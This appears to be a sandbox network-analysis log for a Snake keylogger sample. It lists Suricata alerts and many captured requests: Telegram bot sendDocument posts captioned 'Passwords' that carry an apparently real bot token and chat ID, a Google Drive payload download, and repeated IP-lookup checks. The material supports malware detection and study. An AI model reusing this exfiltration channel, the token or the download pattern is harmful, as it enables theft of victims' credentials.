            Source: Network trafficSuricata IDS: 2057744 - Severity 1 - ET MALWARE Snake/Best Private Keylogger CnC Exfil Via Telegram : 192.168.2.9:50014 -> 149.154.167.220:443
            Source: Network trafficSuricata IDS: 1810008 - Severity 1 - Joe Security ANOMALY Telegram Send File : 192.168.2.9:49946 -> 149.154.167.220:443
            Source: Network trafficSuricata IDS: 2057744 - Severity 1 - ET MALWARE Snake/Best Private Keylogger CnC Exfil Via Telegram : 192.168.2.9:49946 -> 149.154.167.220:443
            Source: Network trafficSuricata IDS: 1810008 - Severity 1 - Joe Security ANOMALY Telegram Send File : 192.168.2.9:50024 -> 149.154.167.220:443
            Source: Network trafficSuricata IDS: 2057744 - Severity 1 - ET MALWARE Snake/Best Private Keylogger CnC Exfil Via Telegram : 192.168.2.9:50024 -> 149.154.167.220:443
            Source: Network trafficSuricata IDS: 1810008 - Severity 1 - Joe Security ANOMALY Telegram Send File : 192.168.2.9:50038 -> 149.154.167.220:443
            Source: Network trafficSuricata IDS: 2057744 - Severity 1 - ET MALWARE Snake/Best Private Keylogger CnC Exfil Via Telegram : 192.168.2.9:50038 -> 149.154.167.220:443
            Source: Network trafficSuricata IDS: 1810008 - Severity 1 - Joe Security ANOMALY Telegram Send File : 192.168.2.9:50044 -> 149.154.167.220:443
            Source: Network trafficSuricata IDS: 2057744 - Severity 1 - ET MALWARE Snake/Best Private Keylogger CnC Exfil Via Telegram : 192.168.2.9:50044 -> 149.154.167.220:443
            Source: unknownDNS query: name: api.telegram.org
            Source: global trafficHTTP traffic detected: GET /xml/8.46.123.189 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
            Source: global trafficHTTP traffic detected: POST /bot7766574905:AAGkK12NqfgMWNTsNJqrFtr2J3oH0W_DuqA/sendDocument?chat_id=2065242915&caption=user%20/%20Passwords%20/%208.46.123.189 HTTP/1.1Content-Type: multipart/form-data; boundary================8dd318d38847f8aHost: api.telegram.orgContent-Length: 1090Connection: Keep-Alive
            Source: global trafficHTTP traffic detected: POST /bot7766574905:AAGkK12NqfgMWNTsNJqrFtr2J3oH0W_DuqA/sendDocument?chat_id=2065242915&caption=user%20/%20Passwords%20/%208.46.123.189 HTTP/1.1Content-Type: multipart/form-data; boundary================8dd31a7b8073b53Host: api.telegram.orgContent-Length: 1090Connection: Keep-Alive
            Source: global trafficHTTP traffic detected: POST /bot7766574905:AAGkK12NqfgMWNTsNJqrFtr2J3oH0W_DuqA/sendDocument?chat_id=2065242915&caption=user%20/%20Passwords%20/%208.46.123.189 HTTP/1.1Content-Type: multipart/form-data; boundary================8dd31bf58e38809Host: api.telegram.orgContent-Length: 1090
            Source: global trafficHTTP traffic detected: POST /bot7766574905:AAGkK12NqfgMWNTsNJqrFtr2J3oH0W_DuqA/sendDocument?chat_id=2065242915&caption=user%20/%20Passwords%20/%208.46.123.189 HTTP/1.1Content-Type: multipart/form-data; boundary================8dd31d58447bfffHost: api.telegram.orgContent-Length: 1090
            Source: global trafficHTTP traffic detected: POST /bot7766574905:AAGkK12NqfgMWNTsNJqrFtr2J3oH0W_DuqA/sendDocument?chat_id=2065242915&caption=user%20/%20Passwords%20/%208.46.123.189 HTTP/1.1Content-Type: multipart/form-data; boundary================8dd31ecffd0d8f8Host: api.telegram.orgContent-Length: 1090
            Source: global trafficHTTP traffic detected: POST /bot7766574905:AAGkK12NqfgMWNTsNJqrFtr2J3oH0W_DuqA/sendDocument?chat_id=2065242915&caption=user%20/%20Passwords%20/%208.46.123.189 HTTP/1.1Content-Type: multipart/form-data; boundary================8dd320728293363Host: api.telegram.orgContent-Length: 1090
            Source: global trafficHTTP traffic detected: POST /bot7766574905:AAGkK12NqfgMWNTsNJqrFtr2J3oH0W_DuqA/sendDocument?chat_id=2065242915&caption=user%20/%20Passwords%20/%208.46.123.189 HTTP/1.1Content-Type: multipart/form-data; boundary================8dd321d1ceee9b7Host: api.telegram.orgContent-Length: 1090
            Source: global trafficHTTP traffic detected: POST /bot7766574905:AAGkK12NqfgMWNTsNJqrFtr2J3oH0W_DuqA/sendDocument?chat_id=2065242915&caption=user%20/%20Passwords%20/%208.46.123.189 HTTP/1.1Content-Type: multipart/form-data; boundary================8dd32345e9c9580Host: api.telegram.orgContent-Length: 1090
            Source: global trafficHTTP traffic detected: POST /bot7766574905:AAGkK12NqfgMWNTsNJqrFtr2J3oH0W_DuqA/sendDocument?chat_id=2065242915&caption=user%20/%20Passwords%20/%208.46.123.189 HTTP/1.1Content-Type: multipart/form-data; boundary================8dd324b8d842ff1Host: api.telegram.orgContent-Length: 1090
            Source: global trafficHTTP traffic detected: POST /bot7766574905:AAGkK12NqfgMWNTsNJqrFtr2J3oH0W_DuqA/sendDocument?chat_id=2065242915&caption=user%20/%20Passwords%20/%208.46.123.189 HTTP/1.1Content-Type: multipart/form-data; boundary================8dd32614e208786Host: api.telegram.orgContent-Length: 1090
            Source: global trafficHTTP traffic detected: POST /bot7766574905:AAGkK12NqfgMWNTsNJqrFtr2J3oH0W_DuqA/sendDocument?chat_id=2065242915&caption=user%20/%20Passwords%20/%208.46.123.189 HTTP/1.1Content-Type: multipart/form-data; boundary================8dd3279b2cf9e25Host: api.telegram.orgContent-Length: 1090
            Source: global trafficHTTP traffic detected: POST /bot7766574905:AAGkK12NqfgMWNTsNJqrFtr2J3oH0W_DuqA/sendDocument?chat_id=2065242915&caption=user%20/%20Passwords%20/%208.46.123.189 HTTP/1.1Content-Type: multipart/form-data; boundary================8dd328f4fe8732cHost: api.telegram.orgContent-Length: 1090
            Source: global trafficHTTP traffic detected: POST /bot7766574905:AAGkK12NqfgMWNTsNJqrFtr2J3oH0W_DuqA/sendDocument?chat_id=2065242915&caption=user%20/%20Passwords%20/%208.46.123.189 HTTP/1.1Content-Type: multipart/form-data; boundary================8dd32a4dc55bf1dHost: api.telegram.orgContent-Length: 1090
            Source: global trafficHTTP traffic detected: POST /bot7766574905:AAGkK12NqfgMWNTsNJqrFtr2J3oH0W_DuqA/sendDocument?chat_id=2065242915&caption=user%20/%20Passwords%20/%208.46.123.189 HTTP/1.1Content-Type: multipart/form-data; boundary================8dd32bd0647d8c6Host: api.telegram.orgContent-Length: 1090
            Source: global trafficHTTP traffic detected: POST /bot7766574905:AAGkK12NqfgMWNTsNJqrFtr2J3oH0W_DuqA/sendDocument?chat_id=2065242915&caption=user%20/%20Passwords%20/%208.46.123.189 HTTP/1.1Content-Type: multipart/form-data; boundary================8dd32d26ef83989Host: api.telegram.orgContent-Length: 1090Connection: Keep-Alive
            Source: global trafficHTTP traffic detected: POST /bot7766574905:AAGkK12NqfgMWNTsNJqrFtr2J3oH0W_DuqA/sendDocument?chat_id=2065242915&caption=user%20/%20Passwords%20/%208.46.123.189 HTTP/1.1Content-Type: multipart/form-data; boundary================8dd32ed1900c427Host: api.telegram.orgContent-Length: 1090Connection: Keep-Alive
            Source: global trafficHTTP traffic detected: POST /bot7766574905:AAGkK12NqfgMWNTsNJqrFtr2J3oH0W_DuqA/sendDocument?chat_id=2065242915&caption=user%20/%20Passwords%20/%208.46.123.189 HTTP/1.1Content-Type: multipart/form-data; boundary================8dd330e4767d75aHost: api.telegram.orgContent-Length: 1090Connection: Keep-Alive
            Source: global trafficHTTP traffic detected: POST /bot7766574905:AAGkK12NqfgMWNTsNJqrFtr2J3oH0W_DuqA/sendDocument?chat_id=2065242915&caption=user%20/%20Passwords%20/%208.46.123.189 HTTP/1.1Content-Type: multipart/form-data; boundary================8dd33221c009098Host: api.telegram.orgContent-Length: 1090Connection: Keep-Alive
            Source: global trafficHTTP traffic detected: POST /bot7766574905:AAGkK12NqfgMWNTsNJqrFtr2J3oH0W_DuqA/sendDocument?chat_id=2065242915&caption=user%20/%20Passwords%20/%208.46.123.189 HTTP/1.1Content-Type: multipart/form-data; boundary================8dd33388384d681Host: api.telegram.orgContent-Length: 1090
            Source: global trafficHTTP traffic detected: POST /bot7766574905:AAGkK12NqfgMWNTsNJqrFtr2J3oH0W_DuqA/sendDocument?chat_id=2065242915&caption=user%20/%20Passwords%20/%208.46.123.189 HTTP/1.1Content-Type: multipart/form-data; boundary================8dd335177883a2dHost: api.telegram.orgContent-Length: 1090
            Source: global trafficHTTP traffic detected: POST /bot7766574905:AAGkK12NqfgMWNTsNJqrFtr2J3oH0W_DuqA/sendDocument?chat_id=2065242915&caption=user%20/%20Passwords%20/%208.46.123.189 HTTP/1.1Content-Type: multipart/form-data; boundary================8dd336907e6a9aeHost: api.telegram.orgContent-Length: 1090
            Source: global trafficHTTP traffic detected: POST /bot7766574905:AAGkK12NqfgMWNTsNJqrFtr2J3oH0W_DuqA/sendDocument?chat_id=2065242915&caption=user%20/%20Passwords%20/%208.46.123.189 HTTP/1.1Content-Type: multipart/form-data; boundary================8dd337f3852d690Host: api.telegram.orgContent-Length: 1090
            Source: global trafficHTTP traffic detected: POST /bot7766574905:AAGkK12NqfgMWNTsNJqrFtr2J3oH0W_DuqA/sendDocument?chat_id=2065242915&caption=user%20/%20Passwords%20/%208.46.123.189 HTTP/1.1Content-Type: multipart/form-data; boundary================8dd339d20965d7cHost: api.telegram.orgContent-Length: 1090
            Source: global trafficHTTP traffic detected: POST /bot7766574905:AAGkK12NqfgMWNTsNJqrFtr2J3oH0W_DuqA/sendDocument?chat_id=2065242915&caption=user%20/%20Passwords%20/%208.46.123.189 HTTP/1.1Content-Type: multipart/form-data; boundary================8dd33c3fda625b7Host: api.telegram.orgContent-Length: 1090
            Source: global trafficHTTP traffic detected: POST /bot7766574905:AAGkK12NqfgMWNTsNJqrFtr2J3oH0W_DuqA/sendDocument?chat_id=2065242915&caption=user%20/%20Passwords%20/%208.46.123.189 HTTP/1.1Content-Type: multipart/form-data; boundary================8dd33e6d407da33Host: api.telegram.orgContent-Length: 1090
            Source: global trafficHTTP traffic detected: POST /bot7766574905:AAGkK12NqfgMWNTsNJqrFtr2J3oH0W_DuqA/sendDocument?chat_id=2065242915&caption=user%20/%20Passwords%20/%208.46.123.189 HTTP/1.1Content-Type: multipart/form-data; boundary================8dd3413d20af3d8Host: api.telegram.orgContent-Length: 1090
            Source: global trafficHTTP traffic detected: POST /bot7766574905:AAGkK12NqfgMWNTsNJqrFtr2J3oH0W_DuqA/sendDocument?chat_id=2065242915&caption=user%20/%20Passwords%20/%208.46.123.189 HTTP/1.1Content-Type: multipart/form-data; boundary================8dd3445bcd1a54aHost: api.telegram.orgContent-Length: 1090Connection: Keep-Alive
            Source: global trafficHTTP traffic detected: POST /bot7766574905:AAGkK12NqfgMWNTsNJqrFtr2J3oH0W_DuqA/sendDocument?chat_id=2065242915&caption=user%20/%20Passwords%20/%208.46.123.189 HTTP/1.1Content-Type: multipart/form-data; boundary================8dd346fcd3daf9cHost: api.telegram.orgContent-Length: 1090Connection: Keep-Alive
            Source: global trafficHTTP traffic detected: POST /bot7766574905:AAGkK12NqfgMWNTsNJqrFtr2J3oH0W_DuqA/sendDocument?chat_id=2065242915&caption=user%20/%20Passwords%20/%208.46.123.189 HTTP/1.1Content-Type: multipart/form-data; boundary================8dd34acc0f4c217Host: api.telegram.orgContent-Length: 1090
            Source: global trafficHTTP traffic detected: POST /bot7766574905:AAGkK12NqfgMWNTsNJqrFtr2J3oH0W_DuqA/sendDocument?chat_id=2065242915&caption=user%20/%20Passwords%20/%208.46.123.189 HTTP/1.1Content-Type: multipart/form-data; boundary================8dd34da4da4320dHost: api.telegram.orgContent-Length: 1090Connection: Keep-Alive
            Source: global trafficHTTP traffic detected: POST /bot7766574905:AAGkK12NqfgMWNTsNJqrFtr2J3oH0W_DuqA/sendDocument?chat_id=2065242915&caption=user%20/%20Passwords%20/%208.46.123.189 HTTP/1.1Content-Type: multipart/form-data; boundary================8dd351bdfb947d2Host: api.telegram.orgContent-Length: 1090
            Source: global trafficHTTP traffic detected: POST /bot7766574905:AAGkK12NqfgMWNTsNJqrFtr2J3oH0W_DuqA/sendDocument?chat_id=2065242915&caption=user%20/%20Passwords%20/%208.46.123.189 HTTP/1.1Content-Type: multipart/form-data; boundary================8dd358ba0a45b44Host: api.telegram.orgContent-Length: 1090
            Source: global trafficHTTP traffic detected: POST /bot7766574905:AAGkK12NqfgMWNTsNJqrFtr2J3oH0W_DuqA/sendDocument?chat_id=2065242915&caption=user%20/%20Passwords%20/%208.46.123.189 HTTP/1.1Content-Type: multipart/form-data; boundary================8dd318d60772313Host: api.telegram.orgContent-Length: 1090
            Source: Joe Sandbox ViewIP Address: 132.226.8.169 132.226.8.169
            Source: Joe Sandbox ViewIP Address: 104.21.48.1 104.21.48.1
            Source: Joe Sandbox ViewJA3 fingerprint: 54328bd36c14bd82ddaa0c04b25ed9ad
            Source: Joe Sandbox ViewJA3 fingerprint: 3b5074b1b5d032e5620f69f9f700ff0e
            Source: unknownDNS query: name: checkip.dyndns.org
            Source: unknownDNS query: name: reallyfreegeoip.org
            Source: Network trafficSuricata IDS: 2803274 - Severity 2 - ETPRO MALWARE Common Downloader Header Pattern UH : 192.168.2.9:49711 -> 132.226.8.169:80
            Source: Network trafficSuricata IDS: 2803274 - Severity 2 - ETPRO MALWARE Common Downloader Header Pattern UH : 192.168.2.9:49750 -> 132.226.8.169:80
            Source: Network trafficSuricata IDS: 2803274 - Severity 2 - ETPRO MALWARE Common Downloader Header Pattern UH : 192.168.2.9:50035 -> 132.226.8.169:80
            Source: Network trafficSuricata IDS: 2803270 - Severity 2 - ETPRO MALWARE Common Downloader Header Pattern UHCa : 192.168.2.9:49709 -> 142.250.181.238:443
            Source: global trafficHTTP traffic detected: GET /uc?export=download&id=1VJ0T7qp0DTXCzKTz6z0CV_0Im_J-iii4 HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:131.0) Gecko/20100101 Firefox/131.0Host: drive.google.comCache-Control: no-cache
            Source: global trafficHTTP traffic detected: GET /download?id=1VJ0T7qp0DTXCzKTz6z0CV_0Im_J-iii4&export=download HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:131.0) Gecko/20100101 Firefox/131.0Cache-Control: no-cacheHost: drive.usercontent.google.comConnection: Keep-Alive
            Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
            Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org
            Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org
            Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org
            Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
            Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
            Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
            Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
            Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
            Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
            Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
            Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
            Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
            Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
            Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
            Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
            Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
            Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
            Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
            Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
            Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
            Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
            Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
            Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
            Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
            Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
            Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
            Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
            Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
            Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
            Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org
            Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
            Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
            Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
            Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
            Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
            Source: unknownHTTPS traffic detected: 104.21.48.1:443 -> 192.168.2.9:49713 version: TLS 1.0
            Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
            Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
            Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
            Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
            Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
            Source: global trafficHTTP traffic detected: GET /uc?export=download&id=1VJ0T7qp0DTXCzKTz6z0CV_0Im_J-iii4 HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:131.0) Gecko/20100101 Firefox/131.0Host: drive.google.comCache-Control: no-cache
            Source: global trafficHTTP traffic detected: GET /download?id=1VJ0T7qp0DTXCzKTz6z0CV_0Im_J-iii4&export=download HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:131.0) Gecko/20100101 Firefox/131.0Cache-Control: no-cacheHost: drive.usercontent.google.comConnection: Keep-Alive
            Source: global trafficHTTP traffic detected: GET /xml/8.46.123.189 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
            Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
            Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org
            Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org
            Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org
            Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
            Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
            Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
            Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
            Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
            Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
            Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
            Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
            Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
            Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
            Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
            Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
            Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
            Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
            Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
            Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
            Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
            Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
            Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
            Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
            Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
            Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
            Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
            Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
            Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
            Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
            Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org
